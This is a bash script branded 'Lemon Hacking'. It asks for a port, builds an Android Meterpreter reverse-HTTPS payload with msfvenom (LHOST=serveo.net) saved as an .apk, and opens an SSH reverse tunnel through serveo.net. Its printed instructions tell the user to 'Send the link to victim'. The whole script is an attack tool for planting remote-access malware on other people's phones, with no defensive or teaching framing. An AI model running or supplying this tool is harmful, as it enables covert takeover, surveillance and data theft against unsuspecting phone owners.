clear

rm $HOME/Lemon/*
clear
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
figlet L e m o n | lolcat -a -d 5
figlet H a c k i n g | lolcat -a -d 5
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
echo By Lemon Hacking | lolcat
echo [+] PLEASE ENTER A PORT, '(more than 1024)' | lolcat
read -p '>> ' port
if [ $port -le 1024 ]
then
printf "\033[1;31m[-] Port must be more than 1024\033[0m\n"
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
else
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
echo [+] Do you want to continue? | lolcat
read -p '>> ' ans
if [ $ans = yes ]
then
echo "[+] Enter Payload's name (Put .apk after your name)" | lolcat
read -p '>> ' name
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
echo "[+] Put your payload's  name after the link after the link you get from sh ssh" | lolcat
echo [+] For Example : lente.serveo.net/yourpayload.apk | lolcat
echo [+] Send the link to victim | lolcat
echo [+] LHOST=serveo.net | lolcat
echo [+] LPORT=$port | lolcat
echo [+] This may take a few minutes | lolcat
echo ‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡‡ | lolcat
msfvenom -p android/meterpreter/reverse_https LHOST=serveo.net LPORT=$port R> $HOME/Lemon/$name & PID=$!
echo "Generating Payload.." | lolcat
printf "["
while kill -0 $PID 2> /dev/null; do
    printf  "▓"
    sleep 2
done
clear && printf "Generated!!" | lolcat
ssh -o "ExitOnForwardFailure yes" -R $port:localhost:$port serveo.net
clear
printf "\033[1;31m[-] Port is in use\033[0m\n"
printf "\033[1;31m[-] Please try again later\033[0m\n"
else
printf "\033[1;31m[-] Exiting..\033[0m\n"
fi
fi






